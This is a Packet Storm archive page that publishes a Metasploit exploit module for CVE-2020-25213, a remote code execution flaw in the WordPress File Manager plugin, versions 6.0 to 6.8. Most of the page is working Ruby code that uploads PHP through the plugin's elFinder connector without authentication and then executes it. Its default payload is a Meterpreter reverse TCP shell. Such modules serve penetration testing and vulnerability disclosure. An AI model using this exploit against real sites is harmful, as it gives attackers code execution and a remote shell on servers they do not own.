exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress File Manager 6.8 Remote Code Execution

WordPress File Manager 6.8 Remote Code Execution
Posted Nov 10, 2020
Authored by Imran E. Dawoodjee, Alex Souza | Site metasploit.com

The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.

tags | exploit, remote, arbitrary, php
advisories | CVE-2020-25213
SHA-256 | cb75a4b68804743f507bff751860e4857ae4e6e2dc885932118f534da8b0dce9

WordPress File Manager 6.8 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',
'Description' => %q{
The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and
execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php
extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write
PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alex Souza (w4fz5uck5)', # initial discovery and PoC
'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
],
'References' =>
[
[ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
[ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
[ 'CVE', '2020-25213' ]
],
'Platform' => [ 'php' ],
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[
'WordPress File Manager 6.0-6.8',
{
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
]
],
'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])
]
)
end

def check
return CheckCode::Unknown unless wordpress_and_online?

# check the plugin version from readme
check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')
end

def exploit
# base path to File Manager plugin
file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')
# filename of the file to be uploaded/created
filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
register_file_for_cleanup(filename)

case datastore['COMMAND']
when 'upload'
elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
when 'mkfile+put'
elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
end

payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
print_status("#{peer} - Payload is at #{payload_uri}")
# execute the payload
send_request_cgi('uri' => normalize_uri(payload_uri))
end

# make it easier to switch between "upload" and "mkfile+put" exploit methods
def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
filename = opts['filename']

# prep for exploit
post_data = Rex::MIME::Message.new
post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')

case elfinder_cmd
when 'upload'
post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
when 'mkfile'
post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
post_data.add_part(filename, nil, nil, 'form-data; name="name"')
when 'put'
post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')
end

res = send_request_cgi(
'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
end
end
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close